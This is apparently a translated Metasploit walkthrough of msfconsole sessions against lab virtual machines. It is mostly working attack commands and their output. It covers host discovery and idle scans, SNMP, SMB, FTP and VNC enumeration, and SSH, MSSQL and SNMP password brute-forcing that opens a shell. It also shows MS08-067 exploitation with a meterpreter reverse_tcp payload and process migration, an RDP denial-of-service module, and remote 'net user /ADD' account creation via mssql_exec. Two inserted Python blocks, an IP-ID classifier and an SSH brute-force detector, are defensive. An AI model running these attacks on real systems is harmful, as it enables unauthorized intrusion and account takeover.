Nmap

Using nmap inside msf (db_nmap) works exactly as it does standalone, so it is not covered in detail here.

msf5 > db_nmap -sV 192.168.172.130
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-07 16:20 CST
[*] Nmap: Nmap scan report for 192.168.172.130
[*] Nmap: Host is up (0.0011s latency).
[*] Nmap: Not shown: 997 closed ports
[*] Nmap: PORT    STATE SERVICE      VERSION
[*] Nmap: 135/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:02:A0:43 (VMware)
[*] Nmap: Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.00 seconds

auxiliary/scanner/

List all modules

msf5 > use auxiliary/scanner [press Tab twice]

Host discovery

Discovery modules

msf5 > use auxiliary/scanner/discovery/ [press Tab twice]
use auxiliary/scanner/discovery/arp_sweep                           use auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement
use auxiliary/scanner/discovery/empty_udp                           use auxiliary/scanner/discovery/udp_probe
use auxiliary/scanner/discovery/ipv6_multicast_ping                 use auxiliary/scanner/discovery/udp_sweep

ARP host discovery:

msf5 > use auxiliary/scanner/discovery/arp_sweep
# Set the target range (RHOSTS); accepted forms: 192.168.1.1-192.168.1.20, 192.168.1.1/24, or 192.168.1.1/24,192.168.2.1/24
msf5 auxiliary(scanner/discovery/arp_sweep) > options
# The source IP (SHOST) and source MAC (SMAC) can be spoofed
# Set the thread count to 20
msf5 auxiliary(scanner/discovery/arp_sweep) > set THREADS 20
msf5 auxiliary(scanner/discovery/arp_sweep) > run
[+] 192.168.172.1 appears to be up (VMware, Inc.).
[+] 192.168.172.2 appears to be up (VMware, Inc.).
[+] 192.168.172.130 appears to be up (VMware, Inc.).
[+] 192.168.172.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

Finding a zombie host (sufficiently idle, IPID increases sequentially)

msf5 > use auxiliary/scanner/ip/ipidseq
msf5 auxiliary(scanner/ip/ipidseq) > set rhosts 192.168.172.1/24
msf5 auxiliary(scanner/ip/ipidseq) > set ports 80
msf5 auxiliary(scanner/ip/ipidseq) > set threads 20
msf5 auxiliary(scanner/ip/ipidseq) > run
[*] 192.168.172.2's IPID sequence class: Incremental!
[*] Scanned  30 of 256 hosts (11% complete)
[*] Scanned  52 of 256 hosts (20% complete)
[*] Scanned  78 of 256 hosts (30% complete)
[*] Scanned 103 of 256 hosts (40% complete)
[*] 192.168.172.130's IPID sequence class: Incremental!
[*] Scanned 129 of 256 hosts (50% complete)
[*] Scanned 154 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

192.168.172.2 and 192.168.172.130 both have incremental IPIDs; if one of them is sufficiently idle (not talking to other hosts), it can serve as the zombie that performs the scan on our behalf.

Idle (zombie) scan with nmap through the zombie host:
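What ipidseq is really reporting is whether a host's IP-ID counter is predictable, which is also what a defender needs to know: such a host should have IP-ID randomization enabled rather than remain a usable zombie. The following is an added example, not Metasploit or Nmap code; it classifies a sampled IP-ID sequence with the class names Nmap prints (thresholds are my own approximation of Nmap's rules) and parses the ipidseq output lines above into a host-to-class map.

```python
import re

# Class names as printed by ipidseq / nmap; the thresholds below are an
# approximation of Nmap's osscan2 rules, not a copy of either tool's code.
ALL_ZEROS = "All zeros"
CONSTANT = "Constant/Duplicated"
INCREMENTAL = "Incremental"
BROKEN_LE = "Broken little-endian incremental"
RANDOM_POS = "Random positive increments"
RANDOMIZED = "Randomized"

def ipid_diffs(ipids):
    """Successive differences; IP-ID is a 16-bit field, so wrap modulo 65536."""
    return [(b - a) % 65536 for a, b in zip(ipids, ipids[1:])]

def classify_ipid_sequence(ipids):
    """Classify IP-IDs sampled from one host (e.g. read out of a pcap)."""
    if len(ipids) < 3:
        raise ValueError("need at least three samples")
    if all(v == 0 for v in ipids):
        return ALL_ZEROS
    diffs = ipid_diffs(ipids)
    if any(d > 20000 for d in diffs):       # huge jumps: randomized IP-ID
        return RANDOMIZED
    if all(d == 0 for d in diffs):
        return CONSTANT
    if all(d % 256 == 0 and d <= 5120 for d in diffs):
        return BROKEN_LE                    # counter stored byte-swapped
    if all(d < 10 for d in diffs):
        return INCREMENTAL
    return RANDOM_POS

def is_predictable(ipids):
    """True when the IP-ID counter is predictable, i.e. the host would be
    reported as a zombie candidate; remediation is IP-ID randomization."""
    return classify_ipid_sequence(ipids) in (INCREMENTAL, BROKEN_LE)

# Sample input: output lines copied from the ipidseq run above.
IPIDSEQ_OUTPUT = """\
[*] 192.168.172.2's IPID sequence class: Incremental!
[*] Scanned  30 of 256 hosts (11% complete)
[*] 192.168.172.130's IPID sequence class: Incremental!
[*] Scanned 256 of 256 hosts (100% complete)
"""
IPIDSEQ_RE = re.compile(r"^\[\*\] (\S+)'s IPID sequence class: (.+?)!?\s*$")

def parse_ipidseq_output(text):
    """Return {host: class} for every host ipidseq reported."""
    return {m[1]: m[2] for m in map(IPIDSEQ_RE.match, text.splitlines()) if m}
```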

msf5 auxiliary(scanner/ip/ipidseq) > db_nmap -sV -PN -sI 192.168.172.130 192.168.172.133
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-08 15:12 CST
[*] Nmap: Idle scan using zombie 192.168.172.130 (192.168.172.130:80); Class: Incremental
[*] Nmap: Nmap scan report for 192.168.172.133
[*] Nmap: Host is up (0.051s latency).
[*] Nmap: Not shown: 986 closed|filtered ports
[*] Nmap: PORT     STATE SERVICE       VERSION
[*] Nmap: 7/tcp    open  echo
[*] Nmap: 9/tcp    open  discard?
[*] Nmap: 13/tcp   open  daytime?
[*] Nmap: 17/tcp   open  qotd          Windows qotd (English)
[*] Nmap: 19/tcp   open  chargen
[*] Nmap: 53/tcp   open  domain?
[*] Nmap: 80/tcp   open  http          Microsoft IIS httpd 6.0
[*] Nmap: 135/tcp  open  msrpc         Microsoft Windows RPC
[*] Nmap: 139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp  open  microsoft-ds  Microsoft Windows 2003 or 2008 microsoft-ds
[*] Nmap: 1025/tcp open  msrpc         Microsoft Windows RPC
[*] Nmap: 1028/tcp open  msrpc         Microsoft Windows RPC
[*] Nmap: 1029/tcp open  msrpc         Microsoft Windows RPC
[*] Nmap: 3389/tcp open  ms-wbt-server Microsoft Terminal Service

Port scanning (nmap is recommended; it is more efficient)

Scan modules

msf5 > use auxiliary/scanner/portscan/ [press Tab twice]
use auxiliary/scanner/portscan/ack        use auxiliary/scanner/portscan/syn        use auxiliary/scanner/portscan/xmas
use auxiliary/scanner/portscan/ftpbounce  use auxiliary/scanner/portscan/tcp

SYN scan

msf5 > use auxiliary/scanner/portscan/syn
msf5 auxiliary(scanner/portscan/syn) > set rhosts 192.168.172.130
msf5 auxiliary(scanner/portscan/syn) > set ports 80
msf5 auxiliary(scanner/portscan/syn) > set threads 50
msf5 auxiliary(scanner/portscan/syn) > run

SNMP scan

Brute-force

msf5 > use auxiliary/scanner/snmp/snmp_login
msf5 auxiliary(scanner/snmp/snmp_login) > set rhosts 192.168.172.135
msf5 auxiliary(scanner/snmp/snmp_login) > set threads 10
msf5 auxiliary(scanner/snmp/snmp_login) > run

A read-only community string (account) was cracked:

[+] 192.168.172.135:161 - Login Successful: public (Access level: read-only); Proof (sysDescr.0): Linux bingyi-virtual-machine 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64

Read information

msf5 auxiliary(scanner/snmp/snmp_login) > use auxiliary/scanner/snmp/snmp_enum
msf5 auxiliary(scanner/snmp/snmp_enum) > set rhosts 192.168.172.135
msf5 auxiliary(scanner/snmp/snmp_enum) > run
[*] System information:

Host IP                       : 192.168.172.135
Hostname                      : bingyi-virtual-machine
Description                   : Linux bingyi-virtual-machine 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64
Contact                       : Me <me@example.org>
Location                      : Sitting on the Dock of the Bay
Uptime snmp                   : 11:18:08.39
Uptime system                 : 00:06:23.04
System date                   : 2020-11-9 10:51:42.0

Windows:

# Enumerate user information
use auxiliary/scanner/snmp/snmp_enumusers
# Enumerate file share information
use auxiliary/scanner/snmp/snmp_enumshares

SMB scan

Discovery

msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.172.131:445   - Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 192.168.172.131:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Scan named pipes

msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/pipe_auditor
msf5 auxiliary(scanner/smb/pipe_auditor) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/smb/pipe_auditor) > run

Enumerate shares

msf5 auxiliary(scanner/smb/pipe_auditor) > use auxiliary/scanner/smb/smb_enumshares
msf5 auxiliary(scanner/smb/smb_enumshares) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/smb/smb_enumshares) > set smbuser msfadmin
msf5 auxiliary(scanner/smb/smb_enumshares) > set smbpass msfadmin
msf5 auxiliary(scanner/smb/smb_enumshares) > run

SSH scan

Discovery

Version scan; an old version may have exploitable vulnerabilities.

msf5 > use auxiliary/scanner/ssh/ssh_version
msf5 auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.172.135
msf5 auxiliary(scanner/ssh/ssh_version) > run
[+] 192.168.172.135:22    - SSH server version: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8 ( service.version=7.2p2 openssh.comment=Ubuntu-4ubuntu2.8 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:7.2p2 os.vendor=Ubuntu os.family=Linux os.product=Linux os.version=16.04 os.cpe23=cpe:/o:canonical:ubuntu_linux:16.04 service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.172.135:22    - Scanned 1 of 1 hosts (100% complete)

Password brute-force

msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.172.135
msf5 auxiliary(scanner/ssh/ssh_login) > set username bingyi
msf5 auxiliary(scanner/ssh/ssh_login) > set pass_file ~/Desktop/dic/shhpass.txt
msf5 auxiliary(scanner/ssh/ssh_login) > set threads 10
msf5 auxiliary(scanner/ssh/ssh_login) > run
[+] 192.168.172.135:22 - Success: 'bingyi:123' 'uid=1000(bingyi) gid=1000(bingyi) groups=1000(bingyi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) Linux bingyi-virtual-machine 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (192.168.172.129:35897 -> 192.168.172.135:22) at 2020-11-11 13:00:13 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
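From the defender's side, an ssh_login run like the one above leaves a burst of failed logins from one source followed by a single success in the target's sshd log. As an added example (not from the page or Metasploit), this detector parses sshd auth-log lines (the sample lines are constructed to mirror the run above) and flags sources whose failures inside a time window reach a threshold, noting whether a success followed the last failure:

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd log lines (not taken from the page), shaped after the
# ssh_login run above: a burst of failures from one source, then a success.
SAMPLE_AUTH_LOG = """\
Nov 11 13:00:01 bingyi-virtual-machine sshd[2101]: Failed password for bingyi from 192.168.172.129 port 35881 ssh2
Nov 11 13:00:02 bingyi-virtual-machine sshd[2103]: Failed password for bingyi from 192.168.172.129 port 35883 ssh2
Nov 11 13:00:04 bingyi-virtual-machine sshd[2105]: Failed password for bingyi from 192.168.172.129 port 35885 ssh2
Nov 11 13:00:07 bingyi-virtual-machine sshd[2107]: Failed password for bingyi from 192.168.172.129 port 35889 ssh2
Nov 11 13:00:13 bingyi-virtual-machine sshd[2109]: Accepted password for bingyi from 192.168.172.129 port 35897 ssh2
Nov 11 13:05:40 bingyi-virtual-machine sshd[2150]: Accepted publickey for admin from 192.168.172.10 port 50122 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<mon>\w{3}) +(?P<day>\d+) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) \w+ for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def parse_sshd_lines(text, year=2020):
    """Return (timestamp, result, user, ip) tuples; syslog lines carry no year."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}",
                                   "%Y %b %d %H:%M:%S")
            events.append((ts, m["result"], m["user"], m["ip"]))
    return events

def detect_bruteforce(events, threshold=3, window_s=60):
    """Map source IP -> (peak failures within one window, success after last failure)
    for every source whose peak failure count reaches the threshold."""
    by_ip = defaultdict(list)
    for ts, result, _user, ip in events:
        by_ip[ip].append((ts, result))
    findings = {}
    for ip, evs in by_ip.items():
        fails = sorted(ts for ts, r in evs if r == "Failed")
        peak, j = 0, 0
        for i, ts in enumerate(fails):          # sliding window over failures
            while (ts - fails[j]).total_seconds() > window_s:
                j += 1
            peak = max(peak, i - j + 1)
        if peak >= threshold:
            success = any(r == "Accepted" and ts > fails[-1] for ts, r in evs)
            findings[ip] = (peak, success)
    return findings
```

A success after a run of failures from the same source is the highest-signal event here; the single key-based login from 192.168.172.10 produces no finding.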

Key brute-force

msf5 auxiliary(scanner/ssh/ssh_login) > use auxiliary/scanner/ssh/ssh_login_pubkey
msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > set rhosts 192.168.172.135
msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > show options
msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > set key_path key.txt
msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > run

FTP

Version scan

msf5 > use auxiliary/scanner/ftp/ftp_version
msf5 auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/ftp/ftp_version) > run
[+] 192.168.172.131:21    - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] 192.168.172.131:21    - Scanned 1 of 1 hosts (100% complete)

Try anonymous login

msf5 auxiliary(scanner/ftp/ftp_version) > use auxiliary/scanner/ftp/anonymous
msf5 auxiliary(scanner/ftp/anonymous) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/ftp/anonymous) > run
[+] 192.168.172.131:21    - 192.168.172.131:21 - Anonymous READ (220 (vsFTPd 2.3.4))
[*] 192.168.172.131:21    - Scanned 1 of 1 hosts (100% complete)

Password brute-force

Windows: using an obtained shell to collect the target's missing patches

Get a shell and migrate it into another process

msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.172.130
msf5 exploit(windows/smb/ms08_067_netapi) > set target 34
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > run -j
# Interact with the session
msf5 exploit(windows/smb/ms08_067_netapi) > sessions 2
# Show the process the shell currently lives in
meterpreter > getpid
# List all processes on the target
meterpreter > ps
# Migrate the shell into another process
meterpreter > migrate 880
# If this later errors with [-] Known bug in WMI query, try migrating to another process, migrate into yet another process

Enumerate missing patches

msf5 exploit(windows/smb/ms08_067_netapi) > use post/windows/gather/enum_patches
msf5 post(windows/gather/enum_patches) > set session 2
msf5 post(windows/gather/enum_patches) > run

VNC

Password brute-force

msf5 > use auxiliary/scanner/vnc/vnc_login
msf5 auxiliary(scanner/vnc/vnc_login) > show options

Try logging in with an empty password

msf5 > use auxiliary/scanner/vnc/vnc_none_auth

RDP (Remote Desktop) vulnerability

Check whether a specific vulnerability is present

msf5 > use auxiliary/scanner/rdp/ms12_020_check
msf5 auxiliary(scanner/rdp/ms12_020_check) > show options
...

Exploit

msf5 auxiliary(scanner/rdp/ms12_020_check) > search ms12-020
msf5 auxiliary(scanner/rdp/ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf5 auxiliary(scanner/rdp/ms12_020_check) > show options
...

MSSQL

Port discovery

Default port: TCP 1433 (or a dynamic port)

Finding the dynamic port:

msf5 > use auxiliary/scanner/mssql/mssql_ping
msf5 auxiliary(scanner/mssql/mssql_ping) > set rhosts 192.168.172.135
msf5 auxiliary(scanner/mssql/mssql_ping) > run

Password brute-force

msf5 > use auxiliary/scanner/mssql/mssql_login
msf5 auxiliary(scanner/mssql/mssql_login) > set rhosts 192.168.172.135
# If a dynamic port is in use, set it manually
msf5 auxiliary(scanner/mssql/mssql_login) > set rport 49165
msf5 auxiliary(scanner/mssql/mssql_login) > set threads 10
msf5 auxiliary(scanner/mssql/mssql_login) > set pass_file pass.txt
msf5 auxiliary(scanner/mssql/mssql_login) > run

Remote command execution

Once the port, account and password are known, remote commands can be executed.

msf5 > use auxiliary/admin/mssql/mssql_exec
msf5 auxiliary(admin/mssql/mssql_exec) > set rhosts 192.168.172.135
msf5 auxiliary(admin/mssql/mssql_exec) > set password 123
# For a dynamic port
msf5 auxiliary(admin/mssql/mssql_exec) > set rport 49165
# The command executed here adds a user
msf5 auxiliary(admin/mssql/mssql_exec) > set CMD net user user pass /ADD

Search for an exploit after obtaining the application version

msf5 > use auxiliary/scanner/ftp/ftp_version
msf5 auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/ftp/ftp_version) > run
[+] 192.168.172.131:21    - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] 192.168.172.131:21    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Knowing the FTP version is 2.3.4, search by the version string:

msf5 auxiliary(scanner/ftp/ftp_login) > search 2.3.4
Matching Modules
================

   #  Name                                                      Disclosure Date  Rank       Check  Description
   -  ----                                                      ---------------  ----       -----  -----------
   0  auxiliary/gather/teamtalk_creds                                            normal     No     TeamTalk Gather Credentials
   1  exploit/multi/http/oscommerce_installer_unauth_code_exec  2018-04-30       excellent  Yes    osCommerce Installer Unauthenticated Code Execution
   2  exploit/multi/http/struts2_namespace_ognl                 2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection
   3  exploit/unix/ftp/vsftpd_234_backdoor                      2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution
   4  exploit/unix/http/zivif_ipcheck_exec                      2017-09-01       excellent  Yes    Zivif Camera iptest.cgi Blind Remote Command Execution

Interact with a module by name or index, for example use 4 or use exploit/unix/http/zivif_ipcheck_exec
